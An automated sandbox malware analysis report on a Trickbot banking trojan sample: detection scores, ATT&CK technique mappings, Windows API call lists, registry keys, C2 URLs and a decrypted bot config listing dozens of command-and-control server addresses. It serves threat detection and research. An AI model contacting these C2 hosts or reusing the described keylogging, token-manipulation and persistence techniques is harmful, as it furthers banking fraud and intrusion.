
Analysis Report 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe

Overview

General Information

Joe Sandbox Version:26.0.0
Analysis ID:982876
Start date:23.10.2019
Start time:11:33:05
Joe Sandbox Product:Cloud
Overall analysis duration:0h 10m 34s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Cookbook file name:default.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of new started processes analysed:5
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.bank.troj.evad.winEXE@4/5@2/3
EGA Information:
  • Successful, ratio: 100%
HCA Information:
  • Successful, ratio: 67%
  • Number of executed functions: 75
  • Number of non-executed functions: 352
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
  • Exclude process from analysis (whitelisted): dllhost.exe, mscorsvw.exe
  • Excluded IPs from analysis (whitelisted): 93.184.221.240, 8.241.121.126, 67.26.81.254, 8.241.9.254, 8.248.119.254, 8.241.9.126, 8.248.129.254, 67.26.75.254, 205.185.216.42, 205.185.216.10
  • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, auto.au.download.windowsupdate.com.c.footprint.net, wu.wpc.apr-52dd2.edgecastdns.net, wu.azureedge.net
  • Report size exceeded maximum capacity and may have missing disassembly code.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy:Threshold
Score:68
Range:0 - 100
Reporting:Report FP / FN
Whitelisted:false
Threat:Trickbot
Detection:malicious

Confidence

Strategy:Threshold
Score:5
Range:0 - 5
Further Analysis Required?:false

Analysis Advice

Contains functionality to modify the execution of threads in other processes
Sample has functionality to log and monitor keystrokes, analyze it with the 'Simulates keyboard and window changes' cookbook
Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access: Valid Accounts (1), Replication Through Removable Media, Drive-by Compromise, Exploit Public-Facing Application, Spearphishing Link, Spearphishing Attachment, Spearphishing via Service, Supply Chain Compromise, Trusted Relationship, Hardware Additions
Execution: Scheduled Task (1), Execution through API (1), Windows Management Instrumentation, Scheduled Task, Command-Line Interface, Graphical User Interface, Scripting, Third-party Software, Rundll32, PowerShell, Execution through API
Persistence: Valid Accounts (1), Scheduled Task (1), Accessibility Features, System Firmware, Shortcut Modification, Modify Existing Service, Path Interception, Logon Scripts, DLL Search Order Hijacking, Change Default File Association, File System Permissions Weakness
Privilege Escalation: Valid Accounts (1), Access Token Manipulation (11), Scheduled Task (1), DLL Search Order Hijacking, File System Permissions Weakness, New Service, Scheduled Task, Process Injection, Service Registry Permissions Weakness, Exploitation for Privilege Escalation, Valid Accounts
Defense Evasion: Valid Accounts (1), Access Token Manipulation (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (2), Masquerading, DLL Search Order Hijacking, Software Packing, Indicator Blocking, Process Injection, Scripting, Indicator Removal from Tools
Credential Access: Input Capture (11), Network Sniffing, Input Capture, Credentials in Files, Account Manipulation, Brute Force, Two-Factor Authentication Interception, Bash History, Input Prompt, Keychain, Private Keys
Discovery: System Time Discovery (2), Query Registry (1), Process Discovery (1), Application Window Discovery (1), Account Discovery (1), System Owner/User Discovery (1), Security Software Discovery (3), Remote System Discovery (1), System Network Configuration Discovery (11), File and Directory Discovery (2), System Information Discovery (14)
Lateral Movement: Application Deployment Software, Remote Services, Windows Remote Management, Logon Scripts, Shared Webroot, Third-party Software, Pass the Hash, Remote Desktop Protocol, Windows Admin Shares, Taint Shared Content, Replication Through Removable Media
Collection: Input Capture (11), Data from Removable Media, Data from Network Shared Drive, Input Capture, Data Staged, Screen Capture, Email Collection, Clipboard Data, Automated Collection, Audio Capture, Video Capture
Exfiltration: Data Encrypted (12), Exfiltration Over Other Network Medium, Automated Exfiltration, Data Encrypted, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over Command and Control Channel, Exfiltration Over Alternative Protocol, Exfiltration Over Physical Medium
Command and Control: Uncommonly Used Port (1), Standard Cryptographic Protocol (22), Standard Non-Application Layer Protocol (2), Standard Application Layer Protocol (2), Standard Cryptographic Protocol, Commonly Used Port, Uncommonly Used Port, Standard Application Layer Protocol, Multilayer Encryption, Connection Proxy, Communication Through Removable Media

Signature Overview


AV Detection:

Yara detected Trickbot
Source: Yara match, File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CF800 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D08A0 CryptStringToBinaryW,CryptStringToBinaryW
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D7190 CryptBinaryToStringW,CryptBinaryToStringW
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006EF800 CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F08A0 CryptStringToBinaryW,CryptStringToBinaryW
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F7190 CryptBinaryToStringW,CryptBinaryToStringW

Spreading:

Creates COM task schedule object (often to register a task for autostart)
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_CLASSES\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\??????.exe, Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\ProgramData\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\ProgramData\??????.exe, Key opened: HKEY_CURRENT_USER_Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\ProgramData\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Contains functionality to enumerate / list files inside a directory
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_0041E050 FindFirstFileA,FindClose
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_0041D790 __EH_prolog,GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CD4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006ED4B0 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,FindClose
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F5710 FindFirstFileW,lstrcmpiW,FindNextFileW,FindNextFileW,Sleep,lstrcmpiW,FindNextFileW,FindNextFileW,FindNextFileW,lstrcmpiW,FindClose
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006EC7C0 Sleep,FindFirstFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindNextFileW,FindClose

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 2404342 ET CNC Feodo Tracker Reported CnC Server TCP group 22 192.168.1.16:49163 -> 81.190.160.139:449
May check the online IP address of the machine
Source: unknown, DNS query: name: api.ipify.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic, TCP traffic: 192.168.1.16:49163 -> 81.190.160.139:449
Connects to IPs without corresponding DNS lookups
Source: unknown, TCP traffic detected without corresponding DNS query: 81.190.160.139
Found strings which match to known social media urls
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Performs DNS lookups
Source: unknown, DNS traffic detected: queries for: api.ipify.org
Urls found in memory or binary data
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp, String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabXy
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0%
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0-
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com0/
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.comodoca.com05
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.entrust.net03
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://ocsp.entrust.net0D
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp, String found in binary or memory: https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/14/path/C:%5CUsers%
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, ??????.exe, 00000003.00000002.543221959.01F62000.00000004.00000001.sdmp, String found in binary or memory: https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/23/1000477/
Source: ??????.exe, 00000003.00000002.541399359.002F3000.00000004.00000020.sdmp, String found in binary or memory: https://81.190.160.139:449/mor27/910646_W617601.4F557F905C84FB5D83C50BBE15B33D58/5/spk/
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: https://api.ipify.org/?format=text
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPS
Source: unknown, Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49164

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_0042BF21 GetAsyncKeyState,SendMessageA

E-Banking Fraud:

Detected Trickbot e-Banking trojan config
Source: ??????.exe, 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, String found in binary or memory: <mcconf> <ver>1000479</ver> <gtag>tt0002</gtag> <servs> <srv>144.91.79.9:443</srv> <srv>172.245.97.148:443</srv> <srv>85.204.116.139:443</srv> <srv>185.62.188.117:443</srv> <srv>185.222.202.76:443</srv> <srv>144.91.79.12:443</srv> <srv>185.68.93.43:443</srv> <srv>195.123.238.191:443</srv> <srv>146.185.219.29:443</srv> <srv>195.133.196.151:443</srv> <srv>91.235.129.60:443</srv> <srv>23.227.206.170:443</srv> <srv>185.222.202.192:443</srv> <srv>190.154.203.218:449</srv> <srv>178.183.150.169:449</srv> <srv>200.116.199.10:449</srv> <srv>187.58.56.26:449</srv> <srv>177.103.240.149:449</srv> <srv>81.190.160.139:449</srv> <srv>200.21.51.38:449</srv> <srv>181.49.61.237:449</srv> <srv>46.174.235.36:449</srv> <srv>36.89.85.103:449</srv> <srv>170.233.120.53:449</srv> <srv>89.228.243.148:449</srv> <srv>31.214.138.207:449</srv> <srv>186.42.98.254:449</srv> <srv>195.93.223.100:449</srv> <srv>181.112.52.26:449</srv> <srv>190.13.160.19:449</srv> <srv>186.71.150.23:449</srv> <srv>190.152.4.98:449</srv> <srv>170.82.156.53:449</s
Yara detected Trickbot
Source: Yara match, File source: 00000003.00000002.541461598.0032A000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: ______.exe PID: 3448, type: MEMORY

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F5AB0 CryptAcquireContextW,CryptImportKey,CryptSetKeyParam,CryptSetKeyParam,CryptDecrypt,CryptDestroyKey,CryptReleaseContext

System Summary:

Contains functionality to call native functions
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D1800 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F1800 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory
Contains functionality to launch a process as a different user
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle
Creates mutexes
Source: C:\ProgramData\??????.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\789C000000010
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Mutant created: \BaseNamedObjects\Global\789C000000010
Detected potential crypto function
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_0040C442
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_004196D8
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_004089E4
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_00413B90
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C5470
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D3430
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CA4D0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CF0E0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D0920
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D05C0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C4DE0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D35E0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D41A0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D1A70
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C2E60
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C8230
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C3EC0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C36E0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D5EB0
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D5710
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006EA4D0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F5710
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006EC7C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E5470
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F3430
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006EF0E0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F0920
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E4DE0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F35E0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F05C0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F41A0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E2E60
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F1A70
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E8230
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E36E0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E3EC0
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F5EB0
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: String function: 00404AE0 appears 55 times
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: String function: 00401690 appears 31 times
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: String function: 00405340 appears 226 times
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: String function: 00417F36 appears 31 times
PE file contains strange resources
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ______.exe.0.dr, Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Source: ______.exe.2.dr, Static PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
Reads the hosts file
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, File read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version info
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.254939532.01880000.00000002.00000001.sdmp, Binary or memory string: System.OriginalFileName vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.257684622.023A0000.00000008.00000001.sdmp, Binary or memory string: originalfilename vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.257684622.023A0000.00000008.00000001.sdmp, Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Source: 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, 00000000.00000002.257727095.025C0000.00000008.00000001.sdmp, Binary or memory string: OriginalFilenameSETUPAPI.DLL.MUIj% vs 2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Sample reads its own file content
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, File read: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe
Classification label
Source: classification engine, Classification label: mal68.bank.troj.evad.winEXE@4/5@2/3
Contains functionality to adjust token privileges (e.g. debug / backup)
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C8CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\ProgramData\??????.exe, Code function: 2_2_005D2F10 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E5470 GetStartupInfoW,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,OpenProcess,OpenProcessToken,GetTokenInformation,AllocateAndInitializeSid,EqualSid,CloseHandle,OpenProcessToken,RevertToSelf,DuplicateTokenEx,CloseHandle,GetTokenInformation,GetTokenInformation,LookupAccountSidW,CreateProcessAsUserW,GetLastError,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006E8CD0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,RevertToSelf,DuplicateTokenEx,CloseHandle,AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\AppData\Roaming\HomeLan\??????.exe, Code function: 3_2_006F2F10 Sleep,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges
Contains functionality to check free disk space
Source: C:\Users\user\Desktop\2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.exe, Code function: 0_2_0041F155 __EH_prolog,GetDiskFreeSpaceA,GetFileTime,SetFileTime,GetFileSecurityA,GetFileSecurityA,GetFileSecurityA,SetFileSecurityA
Contains functionality to enum processes or threads
Source: C:\ProgramData\??????.exe, Code function: 2_2_005CC440 CreateToolhelp32Snapshot,Process32FirstW,lstrcmpW,lstrcmpW,Process32NextW,CloseHandle,lstrcmpW
Contains functionality to instantiate COM classes
Source: C:\ProgramData\??????.exe, Code function: 2_2_005C2DA0 Sleep,GetVersion,CoCreateInstance
Contains functionality to load and extract PE file embedded resourcesShow sources
